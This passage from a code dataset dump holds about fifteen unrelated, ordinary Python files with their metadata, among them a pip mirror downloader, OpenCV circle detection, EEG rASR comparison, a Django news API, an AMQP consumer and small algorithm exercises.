{ano}\")\nprint(\"Fim.\")\n\n\n","sub_path":"exercicios/aulas-auler-master/aula_6/exercicio2.py","file_name":"exercicio2.py","file_ext":"py","file_size_in_byte":5194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"535656678","text":"from getalp.wsd.predicter import Predicter\nimport argparse\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--data_path', required=True, type=str)\n parser.add_argument('--weights', nargs=\"+\", 
type=str)\n args = parser.parse_args()\n\n predicter = Predicter()\n predicter.training_root_path = args.data_path\n predicter.ensemble_weights_path = args.weights\n\n predicter.predict()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"python/getalp/wsd/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"490344548","text":"\"\"\"\npip 下载源\n清华:https://pypi.tuna.tsinghua.edu.cn/simple\n阿里云:http://mirrors.aliyun.com/pypi/simple/\n豆瓣:http://pypi.douban.com/simple/\n\n\"\"\"\n\nimport requests,os,re\nfrom lxml.html import etree\n\nsource_dic={'1':'https://pypi.tuna.tsinghua.edu.cn/simple',\n '2':'http://mirrors.aliyun.com/pypi/simple/',\n '3':'http://pypi.douban.com/simple/'}\nheader={'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.17 Safari/537.36'}\n\nclass Pip_downs:\n def check_file_lines(self,filepath):#检查行数\n count = 0\n for index,line in enumerate(open(filepath, 'r')):\n count += 1\n print(index,line)\n print('count',count)\n\n def write_page(self,file_page,a):#写入文件\n if not os.path.exists(file_page):\n with open(file_page,'w',encoding='utf-8') as f:\n f.write(a)\n\n def read_page(self,file_page):#读取结果\n with open(file_page,'r') as f:\n res=f.read()\n return res\n\n def get_cons(self,flag):#先把html写入文件,输出文件列表\n file_s=''#初始化字符串\n url=''#初始化链接\n if not os.path.exists('res/'):\n os.mkdir('res/')\n if flag=='1':\n file_s='page_tsing.txt'\n url=source_dic['1']\n elif flag=='2':\n file_s='page_ali.txt'\n url=source_dic['2']\n elif flag=='3':\n file_s='page_douban.txt'\n url=source_dic['3']\n file_page='res/'+file_s\n res=requests.get(url,headers=header).text\n self.write_page(file_page,res)#写入文件\n res=self.read_page(file_page)#读取文件\n html=etree.HTML(res)\n lis=html.xpath('/html/body/a/text()')\n print('len_page',len(lis))\n return lis\n\n def get_files_url(self,flag,name):\n base_url=''\n if flag=='1':\n base_url=source_dic['1']\n elif flag=='2':\n base_url=source_dic['2']\n elif flag=='3':\n base_url=source_dic['3']\n full_url=base_url+'/'+name\n new_res=requests.get(full_url).content.decode('utf-8')\n # print(new_res)\n html=etree.HTML(new_res)\n file_names=html.xpath('//body/a/text()')\n file_urls=html.xpath('//body/a/@href')\n print(len(file_names))\n files_dic={}\n for name,url in zip(file_names,file_urls):\n files_dic[name]=base_url[:-7]+url[5:]\n print(files_dic)\n return files_dic\n\n def down_file(self,flag,name,name_s,path):\n files_dic=self.get_files_url(flag,name)\n # name_s='opencv_python-3.1.0.0-cp27-cp27m-macosx_10_6_intel.macosx_10_9_intel.macosx_10_9_x86_64.macosx_10_10_intel.macosx_10_10_x86_64.whl'\n url=files_dic[name_s]\n fi=requests.get(url).content\n with open(path+'/'+name_s,'wb') as f:\n f.write(fi)\n print('{}已下载完成'.format(name))\n\n\nif __name__ == '__main__':\n p =Pip_downs()\n # p.get_files_url('1','opencv-python')\n p.down_file('1','opencv-python','opencv_python-3.1.0.0-cp27-cp27m-macosx_10_6_intel.macosx_10_9_intel.macosx_10_9_x86_64.macosx_10_10_intel.macosx_10_10_x86_64.whl'\n,r'D:\\spiders_python\\python库下载器\\res')\n","sub_path":"python库下载器/downs.py","file_name":"downs.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"397070667","text":"# \r\n# Class: Rank Based Selection\r\n# Distributes the probability of selection according to rank. 
This has less \r\n# selective pressure than fitness based selection. \r\n# \r\n\r\nimport random\r\nimport time\r\nfrom copy import copy\r\nfrom selection import Selection\r\n\r\nclass Rank(Selection):\r\n name = \"Rank Based Selection\"\r\n\r\n def __init__(self, parent_count = 2):\r\n self.parent_count = parent_count\r\n\r\n def selection(self, population):\r\n results = []\r\n probabilities = self.selection_probability(population)\r\n\r\n # Get the number of required parents\r\n while(len(results) < self.parent_count):\r\n random.seed((len(results) + 1) * time.time())\r\n # Roll the dice \r\n p = random.random()\r\n candidate = None\r\n for i in range(len(probabilities)):\r\n # Get the individual that corresponds to the dice roll\r\n if p >= probabilities[i]:\r\n candidate = population[i]\r\n break\r\n # If candidate hasn't been selected, dice roll was last individual\r\n if candidate is None:\r\n candidate = population[-1]\r\n\r\n # Add selected individual to the results\r\n results.append(candidate)\r\n return results\r\n \r\n def selection_probability(self, population):\r\n n = len(population)\r\n # Gauss formula to get the sum of all ranks from 1 to n\r\n rank_sum = n * (n + 1) / 2\r\n\r\n # Calculate the rank based selection probabilities as an array\r\n prob = []\r\n for i in range(len(population)):\r\n prob.append((n - i)/rank_sum)\r\n return prob\r\n \r\n '''\r\n Given that P=3, probabilities are:\r\n sum = 6\r\n 1: (3 - 0) / 6 = 0.50\r\n 2: (3 - 1) / 6 = 0.33\r\n 3: (3 - 2) / 6 = 1.67\r\n [0.5, 0.33, 1.67]\r\n '''\r\n","sub_path":"Python/operators/selection/rank.py","file_name":"rank.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"47266243","text":"# coding: utf-8\n\nfrom django.db import models\n#from freelance import UnixtimeField\n\n# Create your models here.\n\nclass Tag(models.Model):\n\tname = models.CharField(max_length=256)\n\t\n\nclass PermissionsHelper(models.Model):\n\n\tclass Meta:\n\n\t\tmanaged = False\n\n\t\tpermissions = ( \n\t\t\t('upload_image', 'Upload images'),\n\t\t)\n\t\t","sub_path":"web/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"577262919","text":"from joblib import load\nimport os\n\nfrom AppParametersManagement import AppParametersLoader\nfrom DataManagement import DataManager\n\n# ---------------------------------------------------------------------------------------------Load and instance Helpers\n# DataManger instance\ndm = DataManager()\n# App parameters loading and parsing\nparams = AppParametersLoader()\nparams.print_all()\n\n# -------------------------------------------------------------------------------------------------Load and prepare data\nprint(\"Load and prepare data\")\n# Dataset Loading\n# Creating train_test_split subsets and saving them\nif not os.path.exists(params.data_dir()):\n os.makedirs(params.data_dir())\n\ntopredict_brainwave_df = dm.load_data(os.path.join(params.data_dir(), params.topredict_file_name()),\n preprocess=True, # preprocess data if it has not been done yet\n outlier_subjects=[]) # no outliers in data to predict\n\ntopredict_brainwave_df = dm.format_topredict_df(topredict_brainwave_df)\n\n# --------------------------------------------------------------------------------------------------------Load predictor\npredictor = load(os.path.join(params.models_dir(), 
params.predictor_file_name()))\n# ------------------------------------------------------------------------------------------------------make predictions\npredictions = [round(value) for value in predictor.predict(topredict_brainwave_df)]\n# ------------------------------------------------------------------------------------------------------save predictions\npred_path = os.path.join(params.data_dir(),\n \"predicted_\" + params.topredict_file_name())\ndm.save_predictions(topredict_brainwave_df,\n predictions,\n pred_path\n )\n\nprint(f\"Predictions saved on file {pred_path}\")\nv = input(\"insert a value to continue...\")\n","sub_path":"App/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"409583846","text":"import requests\nimport os\n\nos.makedirs('tmp', exist_ok=True)\n\n\ndef download(url):\n basename = os.path.basename(url)\n fullname = os.path.join('tmp', basename)\n fullname = fullname.split('?')[0]\n res = requests.get(url)\n res.raise_for_status()\n imageFile = open(fullname, 'wb')\n for chunk in res.iter_content(1024):\n imageFile.write(chunk)\n imageFile.close()\n return fullname\n","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"119956357","text":"#----------------------------------------------------#\r\n# Plot tool\r\n#----------------------------------------------------#\r\nimport numpy as np\r\nfrom matplotlib.patches import FancyArrowPatch\r\nfrom mpl_toolkits.mplot3d import proj3d\r\n\r\nclass Arrow3D(FancyArrowPatch):\r\n def __init__(self, xs, ys, zs, *args, **kwargs):\r\n FancyArrowPatch.__init__(self, (0, 0), (0, 0), *args, **kwargs)\r\n self._verts3d = xs, ys, zs\r\n\r\n def draw(self, renderer):\r\n xs3d, ys3d, zs3d = self._verts3d\r\n xs, ys, zs = proj3d.proj_transform(xs3d, ys3d, zs3d, renderer.M)\r\n self.set_positions((xs[0], ys[0]), (xs[1], ys[1]))\r\n FancyArrowPatch.draw(self, renderer)\r\n\r\ndef set_axes_radius(ax, origin, radius):\r\n ax.set_xlim3d([origin[0] - radius, origin[0] + radius])\r\n ax.set_ylim3d([origin[1] - radius, origin[1] + radius])\r\n ax.set_zlim3d([origin[2] - radius, origin[2] + radius])\r\n\r\ndef set_axes_equal(ax):\r\n '''Make axes of 3D plot have equal scale so that spheres appear as spheres,\r\n cubes as cubes, etc.. 
This is one possible solution to Matplotlib's\r\n    ax.set_aspect('equal') and ax.axis('equal') not working for 3D.\r\n\r\n    Input\r\n      ax: a matplotlib axis, e.g., as output from plt.gca().\r\n    '''\r\n\r\n    limits = np.array([\r\n        ax.get_xlim3d(),\r\n        ax.get_ylim3d(),\r\n        ax.get_zlim3d(),\r\n    ])\r\n\r\n    origin = np.mean(limits, axis=1)\r\n    radius = 0.5 * np.max(np.abs(limits[:, 1] - limits[:, 0]))\r\n    set_axes_radius(ax, origin, radius)","sub_path":"plottool.py","file_name":"plottool.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"309360039","text":"import cv2\nimport numpy as np\n\nball = cv2.imread('theBall.png')\nh, w, c = ball.shape\ngray_img = cv2.cvtColor(ball, cv2.COLOR_BGR2GRAY)\nimg = cv2.medianBlur(gray_img, 3)\n\ncircles = cv2.HoughCircles(img,cv2.HOUGH_GRADIENT,1, w / 8,\n\n                            param1=100,param2=30,minRadius=10,maxRadius=100)\n\ncircles = np.uint16(np.around(circles))\n\nfor i in circles[0,:]:\n    # draw the outer circle\n    cv2.circle(ball,(i[0],i[1]),i[2],(0,255,0),2)\n    # numpy images are indexed [row, col], i.e. [y, x]\n    print(ball[i[1], i[0]])\n    # draw the center of the circle\n    cv2.circle(ball,(i[0],i[1]),2,(0,0,255),3)\n\ncv2.imwrite(\"test.png\", ball)\n#cv2.imshow(\"HoughCircles\", ball)\ncv2.waitKey()\ncv2.destroyAllWindows()","sub_path":"CircleDetection/circles.py","file_name":"circles.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"641689992","text":"\"\"\"Comparison between RASR Matlab and Python outputs.\nIt is a refactoring of the jupyter notebook and it is extended to include more advanced metrics and figure outputs.\n\"\"\"\n\nfrom utils.config import Config as cfg\nimport mne\nfrom mne.io import read_raw_eeglab\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom pyxdf import load_xdf\nfrom utils.utils import (epoch, get_stream_names, extract_signal_stream, float_index_to_time_index, estimate_rate,\n                         pandas_to_mne, check_params)\nfrom sklearn.pipeline import make_pipeline\nfrom timeflux_rasr.estimation import RASR\nfrom utils.viz import (plot_all_mne_data, plot_time_dist)\nimport logging\nimport os\nfrom timeit import default_timer as timer\nimport numpy as np\n\nConfig = cfg()  # initialize class\nsns.set(font_scale=1)\nlogging.info(\"Config LOADED\")\n\nif __name__ == '__main__':\n    # Kick-Off Notebook for rASR implementation\n    \"\"\"\n    This is the script version for comparison of our implementation with Sarah Blum's Matlab implementation of rASR. \n    It consists of: \n    - loading the eeg signal (and events?) 
from the *xdf* and *set* files\n    - visualizing the power spectral density (check dead channels and line noise) \n    - applying an IIR filter using either a timeflux node or mne functions \n    - epoching and applying any method from the RASR sklearn estimator \n    - qualitative and quantitative comparison of the RASR output\n    - saving the figures and results\n    \"\"\"\n    # TODO: use test configuration for looping through different parameters (SPRINT3)\n    test_configuration = [{\"window_len\": 0.5, \"window_overlap\": 0.66, \"rejection_cutoff\": 3},\n                          {\"window_len\": 0.5, \"window_overlap\": 0.66, \"rejection_cutoff\": 5},\n                          {\"window_len\": 3, \"window_overlap\": 0.9, \"rejection_cutoff\": 3},\n                          {\"window_len\": 3, \"window_overlap\": 0.9, \"rejection_cutoff\": 5}]\n    results_root = Config.results_folder  # keep the unchanged root so the per-test folders do not nest\n    for test_ind in range(len(test_configuration)):  # loop through the test configurations\n\n        Config.results_folder = os.path.join(results_root, f\"test_{test_ind}\")\n        folder_existed = os.path.exists(Config.results_folder)\n        if not folder_existed:\n            os.mkdir(Config.results_folder)\n        # the log file can only be created once its folder exists\n        logging.basicConfig(filename=os.path.join(Config.results_folder, '_output.log'), level=logging.DEBUG)\n        if folder_existed:\n            logging.debug(\"will overwrite previous test\")\n        # Load xdf and extract eeg stream\n        logging.info(\"Load EEG files\")\n        for k_file in range(len(Config.raw_files)):\n            # LOAD DATA\n\n            ## Load raw data\n            raw_xdf_fname = Config.raw_files[k_file]\n            streams, _ = load_xdf(raw_xdf_fname)\n            stream_names = get_stream_names(streams)\n            df_eeg_raw = extract_signal_stream(streams, 'Android_EEG_010026')\n            df_presentation_events = extract_signal_stream(streams, 'Presentation_Markers')\n            eeg_columns = ['Fp1', 'Fp2', 'Fz', 'F7', 'F8', 'FC1', 'FC2', 'Cz', 'C3', 'C4', 'T7',\n                           'T8', 'CPz', 'CP1', 'CP2', 'CP5', 'CP6', 'Tp9', 'Tp10', 'Pz', 'P3',\n                           'P4', 'O1', 'O2']\n            df_eeg_raw = df_eeg_raw.loc[:, eeg_columns]\n            bad_ch = []\n            df_eeg_raw = float_index_to_time_index(df_eeg_raw)\n\n            duration = (df_eeg_raw.index[-1] - df_eeg_raw.index[0]).total_seconds() / 60\n            rate = estimate_rate(df_eeg_raw)\n            test_configuration[test_ind][\"srate\"] = rate\n            mne_eeg_raw, mne_event_id, mne_picks = pandas_to_mne(df_eeg_raw, rate=rate, bad_ch=bad_ch)\n            mne_eeg_filtered_from_raw = mne_eeg_raw.copy().filter(1, 30)\n\n            ## Load filtered data\n            mne_eeg_filtered = read_raw_eeglab(Config.filtered_files[k_file])\n            df_eeg_filtered = mne_eeg_filtered.to_data_frame()\n\n            ## Load calibration data\n            mne_eeg_calibration = read_raw_eeglab(Config.calibration_files[k_file])\n            df_eeg_calibration = mne_eeg_calibration.to_data_frame()\n\n            ## Load rASR output\n\n            mne_eeg_rasr_matlab = read_raw_eeglab(Config.riemannian_asr_out_files[k_file])\n            df_eeg_rasr_matlab = mne_eeg_rasr_matlab.to_data_frame()\n\n            size = int(test_configuration[test_ind][\"srate\"]\n                       * test_configuration[test_ind][\"window_len\"])  # size of window in samples\n            interval = int(size * (1 - test_configuration[test_ind][\"window_overlap\"]))  # step interval in samples\n\n            # convert filtered data into epochs\n            np_eeg_filtered_epochs = epoch(df_eeg_filtered, size, size, axis=0)  # (n_channels, n_times, n_trials)\n            logging.info(\"shape test data\")\n            logging.info(np_eeg_filtered_epochs.shape)\n            # np_eeg_filtered_epochs = np.swapaxes(np_eeg_filtered_epochs, 0, 2 )  # (n_trials, n_channels, n_times)\n\n            # convert calibration data into epochs\n            np_eeg_calibration_epochs = epoch(df_eeg_calibration.values, size, interval,\n                                              axis=0)  # (n_channels, n_times, n_trials)\n            # np_eeg_calibration_epochs = np.swapaxes(np_eeg_calibration_epochs, 0, 2 )# (n_trials, n_channels, n_times)\n            
logging.info(\"shape training data\")\n logging.info(np_eeg_calibration_epochs.shape)\n\n # %% md\n\n ## RASR IMPLEMENTATION\n\n X_fit = np_eeg_calibration_epochs\n X_test = np_eeg_filtered_epochs\n\n rASR_pipeline = make_pipeline(RASR(**check_params(RASR, **test_configuration[test_ind])))\n\n logging.info(\"Pipeline initialized\")\n start = timer()\n rASR_pipeline = rASR_pipeline.fit(X_fit)\n end = timer()\n print(f\"test_{test_ind}: Pipeline fitted in {end - start}s ({(end - start) / X_fit.shape[0]}s/epoch)\")\n\n X_test_transformed = np.zeros(X_test.shape)\n start = timer()\n time_table = - np.ones((X_test.shape[0], 1)) # initialize time table\n for n_epoch in range(X_test.shape[0]):\n start_in = timer()\n X_test_transformed[n_epoch, :, :] = rASR_pipeline.transform(X_test[[n_epoch], :, :])\n time_table[n_epoch] = timer() - start_in\n end = timer()\n print(f\"test_{test_ind}: Pipeline transform in {end - start}s ({(end - start) / X_fit.shape[0]}s/epoch)\")\n title = f\"s{k_file}_transform_computational_time\"\n plot_time_dist(time_table, output_folder=Config.results_folder, title=title)\n\n mne_eeg_rasr_info = mne_eeg_filtered.info\n data = X_test_transformed.reshape(X_test_transformed.shape[0] * X_test_transformed.shape[1], -1).transpose()\n mne_eeg_rasr_python = mne.io.RawArray(data * 1e-6, mne_eeg_rasr_info)\n\n # comparison\n title = f\"s{k_file}_filtered\"\n plot_all_mne_data(mne_eeg_filtered, Config.results_folder, title)\n\n title = f\"s{k_file}_RASR_matlab\"\n plot_all_mne_data(mne_eeg_rasr_matlab, Config.results_folder, title)\n\n title = f\"s{k_file}_RASR_matlab_diff\"\n eeg_rasr_matlab_diff = mne_eeg_filtered[:, 0:len(mne_eeg_rasr_matlab)][0] - mne_eeg_rasr_matlab.get_data()\n mne_eeg_rasr_diff = mne.io.RawArray(data=eeg_rasr_matlab_diff, info=mne_eeg_rasr_matlab.info, verbose=False)\n plot_all_mne_data(mne_eeg_rasr_diff, Config.results_folder, title)\n\n title = f\"s{k_file}_RASR_python\"\n plot_all_mne_data(mne_eeg_rasr_python, Config.results_folder, title)\n\n title = f\"s{k_file}_RASR_python_diff\"\n eeg_rasr_diff = mne_eeg_filtered[:, 0:len(mne_eeg_rasr_python)][0] - mne_eeg_rasr_python.get_data()\n mne_eeg_rasr_diff = mne.io.RawArray(data=eeg_rasr_diff, info=mne_eeg_filtered.info, verbose=False)\n plot_all_mne_data(mne_eeg_rasr_diff, Config.results_folder, title)\n\n title = f\"s{k_file}_RASR_matlab-python_diff\"\n max_samples = min(len(mne_eeg_rasr_matlab), len(mne_eeg_rasr_python)) - 1\n eeg_rasr_matlab_python_diff = np.sqrt((mne_eeg_rasr_matlab[:, 0:max_samples][0] -\n mne_eeg_rasr_python[:, 0:max_samples][0]) ** 2)\n mne_eeg_rasr_diff = mne.io.RawArray(data=eeg_rasr_matlab_python_diff, info=mne_eeg_rasr_matlab.info,\n verbose=False)\n plot_all_mne_data(mne_eeg_rasr_diff, Config.results_folder, title)\n\n # TODO: output more metrics for large scale analysis (e.g. 
parameters effect, etc.)\n","sub_path":"notebooks/script_RASR_comparison.py","file_name":"script_RASR_comparison.py","file_ext":"py","file_size_in_byte":8600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"346937953","text":"\r\ninitial, final = [3, 3, 1], [0, 0, 0]\r\n\r\n\r\n\r\ndef check(current):\r\n if 0 <= current[0] <= 3 and 0 <= current[1] <= 3:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\n\r\ndef checkstate(current):\r\n rightside = [initial[i] - current[i] for i in range(3)]\r\n if current[1] > current[0] and current[0] != 0:\r\n x=0\r\n else:\r\n x=1\r\n if rightside[1] > rightside[0] and rightside[0] != 0:\r\n y=0\r\n else:\r\n y=1\r\n\r\n if x==1 and y==1:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef choose(current):\r\n actions = [[1, 0, 1], [0, 1, 1], [1, 1, 1], [2, 0, 1], [0, 2, 1]]\r\n moves = []\r\n for i in actions:\r\n if current[2] == 1:\r\n j= [current[x] - i[x] for x in range(3)]\r\n else:\r\n j= [current[x] + i[x] for x in range(3)]\r\n if check(j) and checkstate(j):\r\n moves.append(j)\r\n return moves\r\n\r\nans = []\r\n\r\ndef solution(nextstate, visited):\r\n visitedcopy = visited.copy()\r\n if nextstate == final:\r\n visitedcopy.append(nextstate)\r\n ans.append(visitedcopy)\r\n return\r\n elif nextstate in visited:\r\n return\r\n else:\r\n visitedcopy.append(nextstate)\r\n for i in choose(nextstate):\r\n solution(i, visitedcopy)\r\n\r\nsolution([3, 3, 1], [])\r\nprint(*ans, sep=\"\\n\")\r\n","sub_path":"Missionaries and Cannibals Problem.py","file_name":"Missionaries and Cannibals Problem.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"548622647","text":"# (C) 2018 OpenEye Scientific Software Inc. All rights reserved.\n#\n# TERMS FOR USE OF SAMPLE CODE The software below (\"Sample Code\") is\n# provided to current licensees or subscribers of OpenEye products or\n# SaaS offerings (each a \"Customer\").\n# Customer is hereby permitted to use, copy, and modify the Sample Code,\n# subject to these terms. OpenEye claims no rights to Customer's\n# modifications. Modification of Sample Code is at Customer's sole and\n# exclusive risk. Sample Code may require Customer to have a then\n# current license or subscription to the applicable OpenEye offering.\n# THE SAMPLE CODE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED. OPENEYE DISCLAIMS ALL WARRANTIES, INCLUDING, BUT\n# NOT LIMITED TO, WARRANTIES OF MERCHANTABILITY, FITNESS FOR A\n# PARTICULAR PURPOSE AND NONINFRINGEMENT. 
In no event shall OpenEye be\n# liable for any damages or liability in connection with the Sample Code\n# or its use.\n\nimport os\nimport json\nimport pytest\nfrom subprocess import check_output\n\nfrom artemis.wrappers import WorkFloeWrapper, DatasetWrapper, OutputDatasetWrapper\nfrom artemis.test import FloeTestCase\nfrom artemis.decorators import package\nfrom artemis.packaging import OrionTestPackage\n\nfrom datarecord import OEReadRecords\nfrom datarecord.utils import TemporaryPath\n\nimport am1bcc_charge\n\nPACKAGE_DIR = os.path.dirname(os.path.dirname(am1bcc_charge.__file__))\n\nFILE_DIR = os.path.join(PACKAGE_DIR, \"tests\", \"test_data\")\nFLOES_DIR = os.path.join(PACKAGE_DIR, \"floes\")\n\n\ntest_package = OrionTestPackage(manifest=dict(requirements=\"requirements.txt\"))\n# Add the contents of the regular package\ntest_package.add_directory(PACKAGE_DIR)\n# Remove the tests as they have different requirements\ntest_package.remove_directory(\"tests/\")\n# Remove tasks.py as it requires invoke\ntest_package.remove_file(\"tasks.py\")\n\nwith TemporaryPath(suffix=\".txt\") as path:\n    results = check_output([\"python\", \"setup.py\", \"--requires\"], cwd=PACKAGE_DIR)\n    requirements = json.loads(results.decode())\n    with open(path, \"w\") as ofs:\n        for result in requirements:\n            # Create a file with orion requirements\n            ofs.write(\"{}\\n\".format(result))\n    # Add the orion requirements file\n    test_package.add_file(path, dest=\"requirements.txt\")\n\n\n@pytest.mark.floetest\n@package(test_package)\nclass TestReadWriteFloe(FloeTestCase):\n\n    def test_simple_run(self):\n        workfloe = WorkFloeWrapper.get_workfloe(\n            os.path.join(FLOES_DIR, \"charge_floe.py\"),\n            run_timeout=1200\n        )\n        input_file = DatasetWrapper.get_dataset(os.path.join(FILE_DIR, \"10.ism\"))\n        output_file = OutputDatasetWrapper(extension=\".oedb\")\n        workfloe.start(\n            {\n                \"promoted\": {\n                    \"in\": input_file.identifier,\n                    \"out\": output_file.identifier,\n                }\n            }\n        )\n        # Faked locally\n        self.assertEqual(workfloe.state, \"complete\")\n        # Also faked\n        self.assertEqual(\n            len(workfloe.reason),\n            0,\n            \"Failed with reason {}\".format(workfloe.reason)\n        )\n\n        with open(output_file.path, \"rb\") as ifs:\n            records = list(OEReadRecords(ifs))\n        count = len(records)\n        self.assertEqual(count, 10)\n","sub_path":"tests/floe_tests/test_myfloe.py","file_name":"test_myfloe.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"514283233","text":"import asyncio\n\nfrom simple_amqp import AmqpMsg, AmqpParameters\nfrom simple_amqp.asyncio import AsyncioAmqpConnection\n\n\nasync def consumer(msg: AmqpMsg):\n    payload = msg.payload\n    payload = payload.decode()\n    print('msg received: {}'.format(payload))\n\n    # acknowledge that the message was received correctly\n    return True\n\n\nasync def main():\n    conn = AsyncioAmqpConnection(AmqpParameters())\n    channel = conn.channel()\n    exchange = channel.exchange('events.exchange', type='topic')\n    queue = channel.queue('events.queue')\n    queue.bind(exchange, 'logs.topic')\n    queue.consume(consumer)\n\n    await conn.start()\n\n    while True:\n        # wait for messages\n        await asyncio.sleep(1)\n\nif __name__ == '__main__':\n    loop = asyncio.get_event_loop()\n    
loop.run_until_complete(main())\n","sub_path":"examples/asyncio/simple_receiver.py","file_name":"simple_receiver.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"114558513","text":"\"\"\"\n2. Write a program that adds and multiplies two hexadecimal numbers.\nEach number is represented as an array whose elements are the digits of the\nnumber. For example, the user entered A2 and C4F. Store them as ['A', '2'] and\n['C', '4', 'F'] respectively. The sum of the numbers from the example: ['C', 'F', '1'],\nthe product: ['7', 'C', '9', 'F', 'E'].\n\"\"\"\nimport collections\nnumbers = collections.defaultdict(list)\nten_to_hex = [str(i) for i in range(10)] + ['A', 'B', 'C', 'D', 'E', 'F']\n\nfor i in range(2):\n    numbers[i] = list(input('Enter a number in hexadecimal format: ').upper())\n\nfirst = numbers[0]\nsecond = numbers[1]\n\nhex_sum = []\nhex_mult = []\nif len(first) > len(second):\n    first, second = second, first\nfirst.reverse()\nsecond.reverse()\nk = 0\nfor i in range(len(first)):\n    current = ten_to_hex.index(first[i]) + ten_to_hex.index(second[i]) + k\n    hex_sum.append(ten_to_hex[current % 16])\n    # the outgoing carry has to account for the incoming carry as well\n    k = current // 16\n# propagate the carry through the remaining digits of the longer number\nfor i in range(len(first), len(second)):\n    current = ten_to_hex.index(second[i]) + k\n    hex_sum.append(ten_to_hex[current % 16])\n    k = current // 16\nif k:\n    hex_sum.append('1')\nhex_sum.reverse()\nprint('Sum:', hex_sum)\n\n# long multiplication over the little-endian digit arrays\nmult_digits = [0] * (len(first) + len(second))\nfor i in range(len(first)):\n    for j in range(len(second)):\n        mult_digits[i + j] += ten_to_hex.index(first[i]) * ten_to_hex.index(second[j])\n# propagate the carries, then strip leading zeros\nfor i in range(len(mult_digits) - 1):\n    mult_digits[i + 1] += mult_digits[i] // 16\n    mult_digits[i] %= 16\nwhile len(mult_digits) > 1 and mult_digits[-1] == 0:\n    mult_digits.pop()\nhex_mult = [ten_to_hex[d] for d in reversed(mult_digits)]\nprint('Product:', hex_mult)\n","sub_path":"Lesson_5/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"295036567","text":"import os\nfrom time import sleep\n\nfrom core.utils import utils\nfrom telethon import TelegramClient\n\nfrom controllers.messages_controller import Messages\nfrom controllers.channels_controller import Channels\n\n\nclass GetChannels:\n\n    def __init__(self, phone, client_session_name):\n        self.phone = phone\n        self.client_session_name = client_session_name\n        print(\"Initializing\")\n        self.client = self.connect()\n        self.messages_controller = Messages(self.client)\n        self.channels_controller = Channels(\n            client=self.client, phone=self.phone)\n\n    def connect(self):\n        api_id = int(os.getenv(\"API_ID\"))\n        api_hash = os.getenv(\"API_HASH\")\n        client = TelegramClient(self.client_session_name, api_id, api_hash)\n        print(\"Connecting client\")\n        client_connected = client.start()\n\n        while not client_connected:\n            print(\"Client not connected\")\n            client_connected = client.start()\n            sleep(5)\n        # while not client.is_user_authorized():\n        #     print(\"Client is not authorized\")\n        #     phone_number = self.phone\n        #     print(\"Sending code\")\n        #     client.send_code_request(phone_number)\n        \n        #     client.sign_in(phone_number, input('Enter code: '))\n        \n        return client\n\n    def main(self):\n        try:\n            in_phone_channels = self.channels_controller.get_in_phone_channels()\n            for channel in in_phone_channels:\n                channel.messages_raw = self.channels_controller.get_channel_history(\n                    channel=channel)\n        except Exception as error:\n            utils.print_exception()","sub_path":"process/get_channels.py","file_name":"get_channels.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"80290981","text":"\"\"\"\nCreated    : 2018/06/04\nVersion    : V1\nFile name 
: newspapers\nAuthor     : he_wm\nPurpose    : News section API\nSource location : TmSccity_models\\api\\views\\course\\coursehost.py\nModification and feature log:\n    Modified :\n    1. 2018/04/02:\n    2.\n    Features added :\n    1.\n    2.\n\"\"\"\n\nfrom api.models import *\nfrom django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import GenericViewSet, ViewSetMixin\nfrom api.serializers.coursehost import *\nfrom api.views.auth.auth import TmAuth\n\n\nclass NewsPapers(ViewSetMixin, APIView):\n    authentication_classes = [TmAuth, ]\n\n    def list(self, request, *args, **kwargs):\n        \"\"\"\n        News home page listing\n        :param request:\n        :param args:\n        :param kwargs:\n        :return:\n        \"\"\"\n        ret = {'code': 1000, 'data': None}\n        try:\n            queryset = Article.objects.all()\n            ser = ArticleViewSetSerializers(instance=queryset, many=True)\n            ret['data'] = ser.data\n        except Exception as e:\n            ret['code'] = 1001\n            ret['error'] = 'Resource not 